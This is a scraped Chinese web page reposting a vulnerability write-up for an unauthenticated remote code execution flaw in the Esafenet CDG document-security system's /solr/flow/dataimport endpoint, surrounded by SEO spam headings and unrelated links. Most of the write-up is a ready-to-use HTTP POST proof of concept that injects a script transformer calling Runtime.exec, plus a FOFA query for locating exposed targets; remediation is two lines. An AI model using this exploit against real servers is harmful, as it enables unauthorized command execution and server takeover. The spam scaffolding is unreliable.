当前位置: 首页 > news >正文

灵犀科技 网站建设怎样做一家迷你的特卖网站

灵犀科技 网站建设,怎样做一家迷你的特卖网站,网站建设实施规范,移动端网站如何开发0x01 产品简介 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产&…

0x01 产品简介

   亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。

0x02 漏洞概述

   亿赛通电子文档安全管理系统/solr/flow/dataimport接口处存在远程代码执行漏洞,未经授权的攻击者可通过此漏洞执行任意指令,从而获取服务器权限。

0x03 复现环境

 FOFA:app="亿赛通-电子文档安全管理系统"

0x04 漏洞复现 

http://your-ip/solr/flow/dataimport

出现以上这种情况可能存在漏洞

PoC

POST /solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22执行的命令%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.1383.67 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: your-ip<?xml version="1.0" encoding="UTF-8"?><RDF><item/></RDF>

dnslog验证

 RCE

0x05 修复建议 

设置安全组仅对可信地址开放

升级至安全版本

http://www.yayakq.cn/news/596909/

相关文章:

  • 做网站的视频教程2008r2网站建设
  • 有域名可以自己做网站吗上海市网站设计
  • 专门做恐怖的网站做电影网站需要多大空间
  • 做网站要求付全款页面设计背景图片
  • 做凸透镜成像的网站企业网站管理系统用户
  • 邢台做网站备案高端设计网站源码
  • 网站建设对公司的发展网站建设公司何去何从
  • 药品网站建设余姚生活网
  • 做网站图片自动切换网页设计图片里面怎么包含文字
  • 做任务赚佣金网站有哪些做视频解析网站播放器和接口
  • 天津建站模板源码怎么做网页快
  • 网站建设pqiw如何做区块链网站
  • 国外做汽配的网站商丘住房和城乡建设厅网站
  • flashfxp上传多个网站红古微信网站建设
  • 网站开发平台及常用开发工具个人又什么办法做企业网站
  • dede添加网站背景江西九江刚刚发生的新闻
  • 网站备案管局电话单位做好职工养老保险中断补缴的新闻
  • 网站建设 招标书响应式网站设计企业
  • 网站可以随便创建么学计算机能做什么工作
  • 中海园林建设有限公司网站wordpress选择php
  • 海口网站运营托管报价品牌名称
  • 创建网站和主页网站建设人才招聘
  • dede做英文网站优化企业网站备案备注
  • 北京市网站备案查询正在进入一站式服务平台
  • 雄安新区网站建设茂名网站建设哪家好
  • asp.net做三个网站网页制作培训班哪个好
  • 贵城乡建设官方网站wordpress默认账号密码忘记
  • 南宁最新消息今天惠州seo代理商
  • 重庆大渡口营销型网站建设公司推荐网站建设教程培训
  • 搭建一个网站的具体步骤杭州精品网站建设公司